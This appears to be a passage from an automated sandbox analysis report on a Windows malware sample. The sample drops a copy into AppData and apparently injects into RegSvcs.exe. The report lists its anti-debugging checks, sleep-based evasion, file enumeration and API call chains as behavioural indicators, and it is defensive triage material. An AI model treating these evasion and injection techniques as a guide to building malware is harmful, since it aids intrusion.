Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598342	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8486	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1337	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8518	Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-107278

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	API coverage: 5.9 %
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	API coverage: 4.9 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B0445A
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0C6D1 FindFirstFileW,FindClose,	0_2_00B0C6D1
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B0C75C
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0EF95
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F0F2
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0F3F3
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B037EF
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03B12
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0BCBC
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022445A GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0022445A
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022C6D1 FindFirstFileW,FindClose,	2_2_0022C6D1
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0022C75C
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0022EF95
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0022F0F2
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0022F3F3
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_002237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_002237EF
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00223B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00223B12
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_0022BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0022BCBC

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599021	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598852	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596362	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596111	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598342	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.1569679408.000000000078E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll ;
Source: RegSvcs.exe, 00000007.00000002.1729391120.000000000101C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

API call chain: ExitProcess graph end node

graph_0-104654

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B13F09 BlockInput,

0_2_00B13F09

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA3B3A

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AD5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00AD5A7C

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA4B37 LoadLibraryA,GetProcAddress,

0_2_00AA4B37

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_014E7300 mov eax, dword ptr fs:[00000030h]	0_2_014E7300
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_014E8970 mov eax, dword ptr fs:[00000030h]	0_2_014E8970
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_014E89D0 mov eax, dword ptr fs:[00000030h]	0_2_014E89D0
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00D98158 mov eax, dword ptr fs:[00000030h]	2_2_00D98158
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00D997C8 mov eax, dword ptr fs:[00000030h]	2_2_00D997C8
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00D99828 mov eax, dword ptr fs:[00000030h]	2_2_00D99828
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 6_2_01903E00 mov eax, dword ptr fs:[00000030h]	6_2_01903E00
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 6_2_01902730 mov eax, dword ptr fs:[00000030h]	6_2_01902730
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 6_2_01903DA0 mov eax, dword ptr fs:[00000030h]	6_2_01903DA0

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AF80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00AF80A9

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00ACA124 SetUnhandledExceptionFilter,	0_2_00ACA124
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00ACA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00ACA155
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001EA124 SetUnhandledExceptionFilter,	2_2_001EA124
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_001EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_001EA155

